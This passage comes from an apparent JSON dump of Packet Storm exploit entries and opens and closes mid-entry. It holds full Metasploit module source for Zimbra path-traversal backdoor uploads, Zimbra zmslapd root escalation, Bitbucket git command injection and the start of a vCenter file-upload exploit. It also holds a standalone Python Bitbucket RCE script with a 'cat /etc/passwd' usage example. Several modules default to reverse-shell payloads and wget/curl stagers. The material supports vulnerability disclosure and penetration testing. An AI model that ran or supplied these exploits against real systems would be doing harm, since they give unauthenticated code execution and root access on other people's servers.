'../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbraAdmin/public/', \n'TARGET_FILENAME' => nil, \n'RPORT' => 7071, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'Privileged' => false, \n'DisclosureDate' => '2022-05-10', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']), \nOptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']), \nOptString.new('TARGET_USERNAME', [ true, 'The target user, must be valid on the Zimbra server', 'admin']), \n] \n) \nend \n \n# Generate an on-system filename using datastore options \ndef generate_target_filename \nif datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') \nprint_warning('TARGET_FILENAME does not end with .jsp, was that intentional?') \nend \n \nFile.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\") \nend \n \n# Normalize the path traversal and figure out where it is relative to the web root \ndef zimbra_get_public_path(target_filename) \n# Normalize the path \nnormalized_path = Pathname.new(File.join('/opt/zimbra/log', target_filename)).cleanpath \n \n# Figure out where it is, relative to the webroot \nwebroot = Pathname.new('/opt/zimbra/jetty_base/webapps/') \nrelative_path = normalized_path.relative_path_from(webroot) \n \n# Hopefully, we found a path from the webroot to the payload! \nif relative_path.to_s.start_with?('../') \nreturn nil \nend \n \nrelative_path \nend \n \ndef exploit \nprint_status('Encoding the payload as a .jsp file') \npayload = Msf::Util::EXE.to_jsp(generate_payload_exe) \n \n# Create a file \ntarget_filename = generate_target_filename \nprint_status(\"Target filename: #{target_filename}\") \n \n# Create a zip file \nzip = Rex::Zip::Archive.new \nzip.add_file(target_filename, payload) \ndata = zip.pack \n \nprint_status('Sending POST request with ZIP file') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => \"/service/extension/backup/mboximport?account-name=#{datastore['TARGET_USERNAME']}&ow=1&no-switch=1&append=1\", \n'data' => data \n) \n \n# Check the response \nif res.nil? \nfail_with(Failure::Unreachable, \"Could not connect to the target port (#{datastore['RPORT']})\") \nelsif res.code == 404 \nfail_with(Failure::NotFound, 'The target path was not found, target is probably not vulnerable') \nelsif res.code != 401 \nprint_warning(\"Unexpected response from the target (expected HTTP/401, got HTTP/#{res.code}) - exploit likely failed\") \nend \n \n# Get the public path for triggering the vulnerability, terminate if we \n# can't figure it out \npublic_filename = zimbra_get_public_path(target_filename) \nif public_filename.nil? \nfail_with(Failure::BadConfig, 'Could not determine the public web path, maybe you need to traverse further back?') \nend \n \nregister_file_for_cleanup(target_filename) \n \nprint_status(\"Trying to trigger the backdoor @ #{public_filename}\") \n \n# Trigger the backdoor \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(public_filename) \n) \n \nif res.nil? \nfail_with(Failure::Unreachable, 'Could not connect to trigger the payload') \nelsif res.code == 200 \nprint_good('Successfully triggered the payload') \nelsif res.code == 404 \nfail_with(Failure::Unknown, \"Payload was not uploaded, the server probably isn't vulnerable\") \nelse \nfail_with(Failure::Unknown, \"Could not connect to the server to trigger the payload: HTTP/#{res.code}\") \nend \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/168146/zimbra_mboximport_cve_2022_27925.rb.txt"}, {"lastseen": "2022-08-10T16:46:08", "description": "", "cvss3": {}, "published": "2022-08-10T00:00:00", "type": "packetstorm", "title": "Zimbra zmslapd Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-10T00:00:00", "id": "PACKETSTORM:168048", "href": "https://packetstormsecurity.com/files/168048/Zimbra-zmslapd-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Compile \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zimbra zmslapd arbitrary module load', \n'Description' => %q{ \nThis module exploits CVE-2022-37393, which is a vulnerability in \nZimbra's sudo configuration that permits the zimbra user to execute \nthe zmslapd binary as root with arbitrary parameters. As part of its \nintended functionality, zmslapd can load a user-defined configuration \nfile, which includes plugins in the form of .so files, which also \nexecute as root. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Darren Martyn', # discovery and poc \n'Ron Bowes', # Module \n], \n'DisclosureDate' => '2021-10-27', \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Privileged' => true, \n'References' => [ \n[ 'CVE', '2022-37393' ], \n[ 'URL', 'https://darrenmartyn.ie/2021/10/27/zimbra-zmslapd-local-root-exploit/' ], \n], \n'Targets' => [ \n[ 'Auto', {} ], \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'Reliability' => [ REPEATABLE_SESSION ], \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ IOC_IN_LOGS ] \n} \n) \n) \nregister_options [ \nOptString.new('SUDO_PATH', [ true, 'Path to sudo executable', 'sudo' ]), \nOptString.new('ZIMBRA_BASE', [ true, \"Zimbra's installation directory\", '/opt/zimbra' ]), \n] \nregister_advanced_options [ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \nend \n \n# Because this isn't patched, I can't say with 100% certainty that this will \n# detect a future patch (it depends on how they patch it) \ndef check \n# Sanity check \nif is_root? \nfail_with(Failure::None, 'Session already has root privileges') \nend \n \nunless file_exist?(\"#{datastore['ZIMBRA_BASE']}/libexec/zmslapd\") \nprint_error(\"zmslapd executable not detected: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd (set ZIMBRA_BASE if Zimbra is installed in an unusual location)\") \nreturn CheckCode::Safe \nend \n \nunless command_exists?(datastore['SUDO_PATH']) \nprint_error(\"Could not find sudo: #{datastore['SUDOPATH']} (set SUDO_PATH if sudo isn't in $PATH)\") \nreturn CheckCode::Safe \nend \n \n# Run `sudo -n -l` to make sure we have access to the target command \ncmd = \"#{datastore['SUDO_PATH']} -n -l\" \nprint_status \"Executing: #{cmd}\" \noutput = cmd_exec(cmd).to_s \n \nif !output || output.start_with?('usage:') || output.include?('illegal option') || output.include?('a password is required') \nprint_error('Current user could not execute sudo -l') \nreturn CheckCode::Safe \nend \n \nif !output.include?(\"(root) NOPASSWD: #{datastore['ZIMBRA_BASE']}/libexec/zmslapd\") \nprint_error('Current user does not have access to run zmslapd') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nbase_dir = datastore['WritableDir'].to_s \nunless writable?(base_dir) \nfail_with(Failure::BadConfig, \"#{base_dir} is not writable\") \nend \n \n# Generate a random directory \nexploit_dir = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\" \nif file_exist?(exploit_dir) \nfail_with(Failure::BadConfig, 'Exploit dir already exists') \nend \n \n# Create the directory and get ready to remove it \nprint_status(\"Creating exploit directory: #{exploit_dir}\") \nmkdir(exploit_dir) \nregister_dir_for_cleanup(exploit_dir) \n \n# Generate some filenames \nlibrary_name = \".#{rand_text_alphanumeric(5..10)}.so\" \nlibrary_path = \"#{exploit_dir}/#{library_name}\" \nconfig_name = \".#{rand_text_alphanumeric(5..10)}\" \nconfig_path = \"#{exploit_dir}/#{config_name}\" \n \n# Create the .conf file \nconfig = \"modulepath #{exploit_dir}\\nmoduleload #{library_name}\\n\" \nwrite_file(config_path, config) \n \nwrite_file(library_path, generate_payload_dll) \n \ncmd = \"sudo #{datastore['ZIMBRA_BASE']}/libexec/zmslapd -u root -g root -f #{config_path}\" \nprint_status \"Attempting to trigger payload: #{cmd}\" \nout = cmd_exec(cmd) \n \nunless session_created? \nprint_error(\"Failed to create session! Cmd output = #{out}\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/168048/zimbra_slapper_priv_esc.rb.txt"}, {"lastseen": "2022-08-05T16:04:04", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-05T00:00:00", "type": "packetstorm", "title": "Zimbra UnRAR Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-05T00:00:00", "id": "PACKETSTORM:167989", "href": "https://packetstormsecurity.com/files/167989/Zimbra-UnRAR-Path-Traversal.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \ninclude Msf::Exploit::Format::RarSymlinkPathTraversal \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)', \n'Description' => %q{ \nThis module creates a RAR file that can be emailed to a Zimbra server \nto exploit CVE-2022-30333. If successful, it plants a JSP-based \nbackdoor in the public web directory, then executes that backdoor. \n \nThe core vulnerability is a path-traversal issue in unRAR that can \nextract an arbitrary file to an arbitrary location on a Linux system. \n \nThis issue is exploitable on the following versions of Zimbra, provided \nUnRAR version 6.11 or earlier is installed: \n \n* Zimbra Collaboration 9.0.0 Patch 24 (and earlier) \n* Zimbra Collaboration 8.8.15 Patch 31 (and earlier) \n}, \n'Author' => [ \n'Simon Scannell', # Discovery / initial disclosure (via Sonar) \n'Ron Bowes', # Analysis, PoC, and module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-30333'], \n['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'], \n['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'], \n['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'], \n], \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [ \n[ 'Zimbra Collaboration Suite', {} ] \n], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/', \n'TARGET_FILENAME' => nil, \n'DisablePayloadHandler' => false, \n'RPORT' => 443, \n'SSL' => true \n}, \n'Stance' => Msf::Exploit::Stance::Passive, \n'DefaultTarget' => 0, \n'Privileged' => false, \n'DisclosureDate' => '2022-06-28', \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']), \n \n# Separating the path, filename, and extension allows us to randomize the filename \nOptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - \"../../\").']), \nOptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']), \n] \n) \n \nregister_advanced_options( \n[ \nOptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']), \nOptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]), \n \n# Took this from multi/handler \nOptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]), \nOptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ]) \n] \n) \nend \n \n# Generate an on-system filename using datastore options \ndef generate_target_filename \nif datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') \nprint_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?') \nend \n \nFile.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || \"#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp\") \nend \n \n# Normalize the path traversal and figure out where it is relative to the web root \ndef zimbra_get_public_path(target_filename) \n# Normalize the path \nnormalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath \n \n# Figure out where it is, relative to the webroot \nwebroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/') \nrelative_path = normalized_path.relative_path_from(webroot) \n \n# Hopefully, we found a path from the webroot to the payload! \nif relative_path.to_s.start_with?('../') \nreturn nil \nend \n \nrelative_path \nend \n \ndef exploit \nprint_status('Encoding the payload as a .jsp file') \npayload = Msf::Util::EXE.to_jsp(generate_payload_exe) \n \n# Create a file \ntarget_filename = generate_target_filename \nprint_status(\"Target filename: #{target_filename}\") \n \nbegin \nrar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload) \nrescue StandardError => e \nfail_with(Failure::BadConfig, \"Failed to encode RAR file: #{e}\") \nend \n \nfile_create(rar) \n \nprint_good('File created! Email the file above to any user on the target Zimbra server') \n \n# Bail if they don't want the payload triggered \nreturn unless datastore['TRIGGER_PAYLOAD'] \n \n# Get the public path for triggering the vulnerability, terminate if we \n# can't figure it out \npublic_filename = zimbra_get_public_path(target_filename) \nif public_filename.nil? \nprint_warning('Could not determine the public web path, disabling payload triggering') \nreturn \nend \n \nregister_file_for_cleanup(target_filename) \n \ninterval = datastore['CheckInterval'].to_i \nprint_status(\"Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...\") \n \n# This loop is mostly from `multi/handler` \nstime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i \ntimeout = datastore['ListenerTimeout'].to_i \nloop do \nbreak if session_created? \nbreak if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i) \n \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(public_filename) \n) \n \nunless res \nfail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload') \nend \n \nRex::ThreadSafe.sleep(interval) \nend \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/167989/zimbra_unrar_cve_2022_30333.rb.txt"}, {"lastseen": "2022-09-22T18:04:55", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-22T00:00:00", "type": "packetstorm", "title": "Bitbucket Git Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-22T00:00:00", "id": "PACKETSTORM:168470", "href": "https://packetstormsecurity.com/files/168470/Bitbucket-Git-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Bitbucket Git Command Injection', \n'Description' => %q{ \nVarious versions of Bitbucket Server and Data Center are vulnerable to \nan unauthenticated command injection vulnerability in multiple API endpoints. \n \nThe `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint \ncreates an archive of the repository, leveraging the `git-archive` command to do so. \nSupplying NULL bytes to the request enables the passing of additional arguments to the \ncommand, ultimately enabling execution of arbitrary commands. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'TheGrandPew', # discovery \n'Ron Bowes', # analysis and PoC \n'Jang', # testanull - PoC \n'Shelby Pace' # Metasploit module \n], \n'References' => [ \n[ 'URL', 'https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html' ], \n[ 'URL', 'https://attackerkb.com/topics/iJIxJ6JUow/cve-2022-36804/rapid7-analysis' ], \n[ 'URL', 'https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/' ], \n[ 'CVE', '2022-36804' ] \n], \n'Platform' => [ 'linux' ], \n'Privileged' => false, \n'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ], \n'Targets' => [ \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Type' => :linux_dropper, \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'CmdStagerFlavor' => %w[wget curl bourne], \n'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp' } \n} \n], \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Type' => :unix_cmd, \n'Arch' => ARCH_CMD, \n'Payload' => { 'BadChars' => %(:/?#[]@) }, \n'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_bash' } \n} \n] \n], \n'DisclosureDate' => '2022-08-24', \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ IOC_IN_LOGS ], \n'SideEffects' => [ REPEATABLE_SESSION ] \n} \n) \n) \n \nregister_options( \n[ \nOpt::RPORT(7990), \nOptString.new('TARGETURI', [ true, 'The base URI of Bitbucket application', '/']), \nOptString.new('USERNAME', [ false, 'The username to authenticate with', '' ]), \nOptString.new('PASSWORD', [ false, 'The password to authenticate with', '' ]) \n] \n) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'GET', \n'keep_cookies' => true, \n'uri' => normalize_uri(target_uri.path, 'login') \n) \n \nreturn CheckCode::Unknown('Failed to receive response from application') unless res \n \nunless res.body.include?('Bitbucket') \nreturn CheckCode::Safe('Target does not appear to be Bitbucket') \nend \n \nfooter = res.get_html_document&.at('footer') \nreturn CheckCode::Detected('Cannot determine version of Bitbucket') unless footer \n \nversion_str = footer.at('span')&.children&.text \nreturn CheckCode::Detected('Cannot find version string in footer') unless version_str \n \nmatches = version_str.match(/v(\\d+\\.\\d+\\.\\d+)/) \nreturn CheckCode::Detected('Version unknown') unless matches && matches.length > 1 \n \nversion_str = matches[1] \nvprint_status(\"Found Bitbucket version: #{matches[1]}\") \n \nnum_vers = Rex::Version.new(version_str) \nreturn CheckCode::NotVulnerable if num_vers <= Rex::Version.new('6.10.17') \n \nmajor, minor, revision = version_str.split('.') \ncase major \nwhen '6' \nreturn CheckCode::Appears \nwhen '7' \ncase minor \nwhen '6' \nreturn CheckCode::Appears if revision.to_i < 17 \nwhen '17' \nreturn CheckCode::Appears if revision.to_i < 10 \nwhen '21' \nreturn CheckCode::Appears if revision.to_i < 4 \nend \nwhen '8' \ncase minor \nwhen '0', '1' \nreturn CheckCode::Appears if revision.to_i < 3 \nwhen '2' \nreturn CheckCode::Appears if revision.to_i < 2 \nwhen '3' \nreturn CheckCode::Appears if revision.to_i < 1 \nend \nend \n \nCheckCode::Detected \nend \n \ndef username \ndatastore['USERNAME'] \nend \n \ndef password \ndatastore['PASSWORD'] \nend \n \ndef authenticate \nprint_status(\"Attempting to authenticate with user '#{username}' and password '#{password}'\") \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'login'), \n'keep_cookies' => true \n) \n \nfail_with(Failure::UnexpectedReply, 'Failed to reach login page') unless res&.body&.include?('login') \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'j_atl_security_check'), \n'keep_cookies' => true, \n'vars_post' => \n{ \n'j_username' => username, \n'j_password' => password, \n'submit' => 'Log in' \n} \n) \n \nfail_with(Failure::UnexpectedReply, 'Failed to retrieve a response from log in attempt') unless res \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'dashboard'), \n'keep_cookies' => true \n) \n \nfail_with(Failure::UnexpectedReply, 'Failed to receive a response from the dashboard') unless res \n \nunless res.body.include?('Your work') && res.body.include?('Projects') \nfail_with(Failure::BadConfig, 'Login failed...Credentials may be invalid') \nend \n \n@authenticated = true \nprint_good('Successfully logged into Bitbucket!') \nend \n \ndef find_public_repo \nprint_status('Searching Bitbucket for publicly accessible repository') \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, 'rest/api/latest/repos'), \n'keep_cookies' => true \n) \n \nfail_with(Failure::Disconnected, 'Did not receive a response') unless res \njson_data = JSON.parse(res.body) \nfail_with(Failure::UnexpectedReply, 'Response had no JSON') unless json_data \n \nunless json_data['size'] > 0 \nfail_with(Failure::NotFound, 'Bitbucket instance has no publicly available repositories') \nend \n \n# opt for public repos unless none exist. \n# Attempt to use a private repo if so \nrepos = json_data['values'] \npossible_repos = repos.select { |repo| repo['public'] == true } \nif possible_repos.empty? && @authenticated \npossible_repos = repos.select { |repo| repo['public'] == false } \nend \n \nfail_with(Failure::NotFound, 'There doesn\\'t appear to be any repos to use') if possible_repos.empty? \npossible_repos.each do |repo| \nproject = repo['project'] \nnext unless project \n \n@project = project['key'] \n@repo = repo['slug'] \nbreak if @project && @repo \nend \n \nfail_with(Failure::NotFound, 'Failed to find a repo to use for exploit') unless @project && @repo \nprint_good(\"Found public repo '#{@repo}' in project '#{@project}'!\") \nend \n \ndef execute_command(cmd, _opts = {}) \nuri = normalize_uri(target_uri.path, 'rest/api/latest/projects', @project, 'repos', @repo, 'archive') \nsend_request_cgi( \n'method' => 'GET', \n'uri' => uri, \n'keep_cookies' => true, \n'vars_get' => \n{ \n'format' => 'zip', \n'path' => Rex::Text.rand_text_alpha(2..5), \n'prefix' => \"#{Rex::Text.rand_text_alpha(1..3)}\\x00--exec=`#{cmd}`\\x00--remote=#{Rex::Text.rand_text_alpha(3..8)}\" \n} \n) \nend \n \ndef exploit \n@authenticated = false \nauthenticate unless username.blank? && password.blank? \nfind_public_repo \n \nif target['Type'] == :linux_dropper \nexecute_cmdstager(linemax: 6000) \nelse \nexecute_command(payload.encoded) \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/168470/bitbucket_git_cmd_injection.rb.txt"}, {"lastseen": "2023-03-24T17:02:13", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-24T00:00:00", "type": "packetstorm", "title": "Bitbucket 7.0.0 Remote Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2023-03-24T00:00:00", "id": "PACKETSTORM:171453", "href": "https://packetstormsecurity.com/files/171453/Bitbucket-7.0.0-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: Bitbucket v7.0.0 - RCE \n# Date: 09-23-2022 \n# Exploit Author: khal4n1 \n# Vendor Homepage: https://github.com/khal4n1 \n# Tested on: Kali and ubuntu LTS 22.04 \n# CVE : cve-2022-36804 \n \n#****************************************************************# \n#The following exploit is used to exploit a vulnerability present \n#Atlassian Bitbucket Server and Data Center 7.0.0 before version \n#7.6.17, from version 7.7.0 before version 7.17.10, from version \n#7.18.0 before version 7.21.4, from version 8.0.0 before version \n#8.0.3, from version 8.1.0 before version 8.1.3, and from version \n#8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 \n \n#Usage Example \n \n# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd' \n \n# python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id' \n \n#The server will send a 500 http response with the stout output from the \n# command executed. \n \n \n#****************************************************************# \n \n#!/usr/bin/python3 \n \nimport argparse \nimport urllib \nfrom urllib import request \nimport re \n \n#argument setup \nparser = argparse.ArgumentParser(description='Program to test \nbitbucket vulnerability CVE-2022-36804') \nparser.add_argument(\"--url\", help=\"Set the target to attack. \n[REQUIRED]\", required=True ) \nparser.add_argument(\"--cmd\", help=\"Set the command to execute. \n[DEFAULT ID]\", required=True, default='id') \nargs = parser.parse_args() \ncmd= urllib.parse.quote(args.cmd) \n \n \n#reads from the public repository what is available \nrequ = request.urlopen(args.url+ \"/repos?visibility=public\") \nresponse = requ.read() \n \n#select a public project and stores it in a variable \nproject = re.findall('7990/projects/(.*)/repos/', \nstr(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1] \n \n#Selects a public repo and stores it in a vatiable \nfile = re.findall('/repos/(.*)/browse', \nstr(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0] \n \n# Exploitation \ntry : \nattack = request.urlopen(args.url + \n\"/rest/api/latest/projects/\" + project + \"/repos/\" + file + \n\"/archive?prefix=ax%00--exec=%60\"+cmd+\"%60%00--remote=origin\") \nprint (attack.response()) \nexcept urllib.error.HTTPError as e: \nbody = e.read().decode() # Read the body of the error response \nprint (body) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/171453/bitbucket700-exec.txt"}, {"lastseen": "2021-10-07T14:18:18", "description": "", "cvss3": {}, "published": "2021-10-07T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-07T00:00:00", "id": "PACKETSTORM:164439", "href": "https://packetstormsecurity.com/files/164439/VMware-vCenter-Server-Analytics-CEIP-Service-File-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload', \n'Description' => %q{ \nThis module exploits a file upload in VMware vCenter Server's \nanalytics/telemetry (CEIP) service to write a system crontab and \nexecute shell commands as the root user. \n \nNote that CEIP must be enabled for the target to be exploitable by \nthis module. CEIP is enabled by default. \n}, \n'Author' => [ \n'George Noseevich', # Discovery \n'Sergey Gerasimov', # Discovery \n'VMware', # Initial PoC \n'Derek Abdine', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-22005'], \n['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'], \n['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'], \n['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'], \n['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee'] \n], \n'DisclosureDate' => '2021-09-21', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, 